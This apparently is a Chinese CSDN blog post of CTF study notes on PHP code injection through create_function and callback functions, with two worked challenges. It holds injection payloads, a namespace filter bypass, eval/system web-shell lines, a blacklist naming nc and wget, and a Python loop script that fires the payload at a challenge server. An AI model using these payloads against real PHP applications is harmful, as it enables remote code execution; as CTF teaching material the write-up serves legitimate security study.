CTF题型 匿名函数考法&例题总结

最新推荐文章于 2024-03-26 19:44:39 发布
最新推荐文章于 2024-03-26 19:44:39 发布
阅读量1.2k 收藏 31
点赞数 28
分类专栏: Web学习笔记 CTF考点刷题总结 文章标签: CTF Web 网络安全 笔记 安全 RCE 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39947980/article/details/136890009
版权

CTF题型 匿名函数考法&例题总结

文章目录

一 .原理分析

匿名函数特点:无函数名,使用一次就被丢弃,一般可以动态执行php代码

二 .重点匿名函数利用

请熟记并理解为后面php代码审计打基础

1.create_function()

image-20240320104058936

创建一个匿名(lambda样式)函数

第一次创建了一个叫 lambda_1 的函数,此后调用依次递增lambda_2…

注意 实际为 %00lambda_1只不过%00不可见而已

create_function ( string $args , string $code ) : string

根据传递的参数创建一个匿名函数,并为其返回唯一的名称。如果没有严格对参数传递进行过滤,攻击者可以构造payload传递给create_function()对参数或函数体闭合注入恶意代码导致代码执行

可以闭合代码,实现eval执行任意命令

如何实现create_function代码注入

闭合方式不唯一,按实际代码决定

create_function('$name','echo $name."alex"')

等同与创建了一个函数:

function fT($fname) {
  echo $fname."alex";
}

并返回这个函数名 lambda_1

极其类似sql注入 (使前面闭合,使后面注释)

例如

<?php
$id=$_GET['id'];
$str2='echo  $a'.'test'.$id.";";
echo $str2;
echo "<br/>";
echo "==============================";
echo "<br/>";
$f1 = create_function('$a',$str2);
?>

id值可控

原函数:
function fT($a){
  echo $a."test".$id;
}

代码注入后:
function fT($a){
  echo $a."test";}phpinfo();/*;
}

2.array_map()

array_map — 为数组的每个元素应用回调函数

image-20240320105455991

利用: 第一个参数为 回调函数,第二个参数为 参数数组

image-20240320105756416

3.call_user_func()

call_user_func — 把第一个参数作为回调函数调用

image-20240320110020370

同样的第一个参数是回调函数 不过第二个参数是 字符串 不是数组

image-20240320110214845

4.call_user_func_array()

和array_map一模一样 利用: 第一个参数为 回调函数,第二个参数为 参数数组

image-20240320110325072

5.array_filter()

array_filter — 使用回调函数过滤数组的元素

image-20240320110454117

和array_map()对调一下位置 第一个参数为 参数数组,第二个参数为 回调函数

image-20240320110621408

三.例题讲解

1.[Polar 靶场 某函数的复仇]

环境 :https://www.polarctf.com/#/page/challenges

<?php
highlight_file(__FILE__);
//flag:/flag
if(isset($_POST['shaw'])){
    $shaw = $_POST['shaw'];
    $root = $_GET['root'];
    if(preg_match('/^[a-z_]*$/isD',$shaw)){
        if(!preg_match('/rm|ch|nc|net|ex|\-|de|cat|tac|strings|h|wget|\?|cp|mv|\||so|\$/i',$root)){
            $shaw('',$root);
        }else{
            echo "Almost there^^";
        }
    }
}
?>

特征:$shaw('',$root);

方法名可控,第二个参数可控,那么我们考虑create_function();

这里保证$shaw=开头是[a-z_] 结尾是任意字符的字符

直接传 create_function即可

扩展(非本题)

这里提一嘴(经常考) 如果正则匹配 过滤 开头是[a-z_] 结尾是任意字符的字符 不可行 如何绕过?

if(preg_match('/^[a-z_]*$/isD',$shaw) 方法名绕过

通过 命名空间绕过 因为 \create_function()等价于create_function()

什么是命名空间(\)

在PHP的命名空间默认为\,所有的函数和类都在\这个命名空间中,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name() 这样调用函数,则其实是写了一个绝对路径。如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。

#例
<?php namespace ccc;\eval($_REQUEST['a']);
<?php \system('cat /tmp/flag_XXXX');

接着闭合代码 底层实现{return $root}

我们用 ;}任意代码//闭合

注意这里过滤了 h phpinfo();是被过滤了的

image-20240320115209874

2.[2023 安洵杯 what’s my name]

题目环境:https://github.com/D0g3-Lab/i-SOON_CTF_2023/tree/main/web/

<?php
highlight_file(__file__);
$d0g3=$_GET['d0g3'];
$name=$_GET['name'];
if(preg_match('/^(?:.{5})*include/',$d0g3)){
    $sorter='strnatcasecmp';
    $miao = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
    if(strlen($d0g3)==substr($miao, -2)&&$name===$miao){
        $sort_function = ' return 1 * ' . $sorter . '($a["' . $d0g3 . '"], $b["' . $d0g3 . '"]);';
        @$miao=create_function('$a, $b', $sort_function);
    }
    else{
        echo('Is That My Name?');
    }
}
else{
    echo("YOU Do Not Know What is My Name!");
}
?>

@$miao=create_function('$a, $b', $sort_function);匿名函数可以执行命令

闭合根据$sort_function = ' return 1 * ' . $sorter . '($a["' . $d0g3 . '"], $b["' . $d0g3 . '"]);'; 其中$d0g3可控

原本闭合payload:'"]);}payload//

但是要满足if(preg_match('/^(?:.{5})*include/',$d0g3))

前5个任意字符+include

所以闭合用"]);}include();//将 前面的 ’ 当成字符看了

 $miao = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
    if(strlen($d0g3)==substr($miao, -2)&&$name===$miao)

m i a o 为返回的匿名函数名称,判断 miao为返回的匿名函数名称,判断 miao为返回的匿名函数名称,判断name=== m i a o 而且 s t r l e n ( miao而且strlen( miao而且strlen(d0g3==substr($miao))

探究一下返回的匿名函数名称

image-20240320131200836

注意还有两位不可见字符 可以用%00lambda_x绕过强相等image-20240320131302930

"]);}include(phpinfo());//

有26位字符

第26次 到lambda_626时执行命令

可以写个脚本

import requests
url='http://23.94.38.86:9999/?name=%00lambda_26'
params={
    'd0g3':"\"]);}include(phpinfo());//"
}
i=0
while True:
    i=i+1
    response=requests.get(url,params=params)
    print('+'+str(i))
    if 'php.net' in response.text:
        print(response.text)
        break

注意一点

#在Python的requests库中,当你发送一个请求并尝试传递一个包含%00的字符串时,默认情况下requests库会尝试对这个字符串进行URL编码。这是因为%00是一个URL编码的字符,对应于ASCII的NULL字符
#所以写死name的值

可以返回phpinfo的内容

image-20240320215250956

其他命令同理

J1rrY_
关注
  • 28
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF学习笔记——Easy Calc
Obs_cure的博客
09-06 1236
一、[RoarCTF 2019]Easy Calc 1.题目 2.解题步骤 发现框框…应该是注入题…源码中提示有个waf,继续看源码,发现有个calc.php,进去看看 初步理解应该是用num传参,然后返回计算结果,这个php文件用于过滤非法字符。 被拦下来了,大概是利用num构造一个payload,不能含有字母和非法字符,只能有数字和符号 这里已经不会了,看writeup吧… 3.总结 4.参考资料 [RoarCTF 2019]Easy Calc(http走私 && 利用PHP
CTF命令执行及绕过技巧
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
PolarD&N 中等难度
最新发布
konpure的博客
03-26 756
是为了闭合前面的语句/*注释掉了后面的语句,由于第二个preg语句对该payload进行了过滤cat,tac,等无法使用,可以用less,more,head,tail,od等进行替换,该payload中间的+是因为使用的是bp上传,如果没有加号会导致payload后半部分无法读入,故用+连接,如果使用hackbar则不用+号。又是和反序列化相关的题目,为了使fetflag方法运行,直接赋值Polar1和Night,使其实现相等判断,由于这些变量具有私有属性或保护属性,调用时需要使用伪变量,具体脚本如下。
[SUCTF 2018]annonymous creat_function匿名函数~~
a3320315的博客
02-13 923
源码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($...
Polar靶场 某函数的复仇
m0_64016126的博客
12-26 416
常规读取文件的命令cat,tac,head,sort等被过滤,我们可以直接使用反斜杠 \ 绕过,当然也可以使用less,tail命令来绕过。可以看到成功RCE,这里phpinfo()是无法执行的,因为过滤了h,题目提示或者 ls / 可以知道flag在根目录。题目的意思很明显了,就是让我们利用 create_function这个函数getshell,我们让 $shaw=其中}是为了闭合函数,//是为了注释后面的代码从而让我们执行我们想要执行的代码。create_function() 函数。
ctfweb题型总结大全(例题wp都有)
04-17
欢迎关注hacking水友攻防实验室,更多内容都在微信公众号
CTF MISC安全杂项经典例题讲解
10-22
该内容为CTF赛题MISC安全杂项经理例题讲解,包含图片隐写,流量分析,web安全等多种题型讲解,图文结合,适合新手学习。
CTF简介,帮助了解CTF题型
09-12
CTF夺旗赛介绍用ppt,CTF简介,各种CTF题型简介,各种题型对应的典型竞赛工具简介,入门可看,希望能帮助到大家
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
资源ctf工具 &&游戏&&-附件资源
03-05
资源ctf工具 &&游戏&&-附件资源
CTFshow——PHP特性(下)
D.MIND 的博客
02-21 1894
目录:web132——逻辑运算符的优先级web133——curl -Fweb134——php变量覆盖web135—— >xx.txt 写文件web136—— tee命令 web132——逻辑运算符的优先级 打开是一个网站,访问robots.txt 得到指引/admin <?php #error_reporting(0); include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) &&
ctf命令执行漏洞(一)
wlllllianqing的博客
10-12 1912
命令执行漏洞原理 命令执行漏洞,就是指用户通过浏览器或其他辅助程序提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,用户可以提交恶意语句并交由服务器执行。 在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。 相关函数 ...
polar靶场通关笔记
weixin_43296565的博客
06-06 4495
这里是关于自己打polar靶场的小笔记
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1293
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
ctf命令执行小结
舞动的獾
10-04 4463
1.相关函数 eval函数eval函数能够将字符串当作命令执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
[ctf web]web题中php经常遇到的函数
ShenZ的博客
07-24 1109
函数 substr call_user_func 把第一个参数作为回调函数调用 版本 说明 5.3.0 对面向对象里面的关键字的解析有所增强。在此之前,使用两个冒号来连接一个类和里面的一个方法,把它作为参数来作为回调函数的话,将会发出一个**E_STRICT**的警告,因为这个传入的参数被视为静态方法。 用call_user_func()来调用一个类里面的方法 <?php class myclass { static function say_hello() {
call_user_func()详解
热门推荐
moliyiran的专栏
10-29 3万+
先来看解释 : (PHP 4, PHP 5, PHP 7) call_user_func — 把第一个参数作为回调函数调用 通过函数的方式回调 &lt;?php  function barber($type){     echo "you wanted a $type haircut, no problem\n"; } call_user_func('barber','mushroom');...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
rsa ctf题型 python3 脚本
08-14
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于加密和解密通信内容。在CTF比赛中,通常会出现RSA题型,要求编写Python3脚本来解决该问题。 以下是一个示范的Python3脚本,用于解决RSA CTF题型问题: ```python import binascii import gmpy2 def rsa_decrypt(c, p, q, e): n = p * q phi = (p - 1) * (q - 1) d = gmpy2.invert(e, phi) m = pow(c, d, n) return binascii.unhexlify(hex(m)[2:]).decode() # 示例数据 ciphertext = 0x696c6f766563686174313233 p = 35742549198872617291353508656626642567 q = 616012647683 e = 65537 plaintext = rsa_decrypt(ciphertext, p, q, e) print("明文:", plaintext) ``` 以上脚本中,`rsa_decrypt`函数接受RSA密文、素数`p`和`q`,以及公钥指数`e`作为输入参数,返回解密得到的明文。在主函数中,给定示例的RSA密文、素数和公钥指数,使用 `rsa_decrypt` 函数解密得到明文,并打印出来。 需要注意的是,实际的RSA CTF题目可能会有其他变量或算法,因此上述脚本需要根据具体情况进行适当修改。此外,在CTF比赛中,还需要考虑到一些常用的攻击方法,例如Factoring Attack、Common Modulus Attack等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值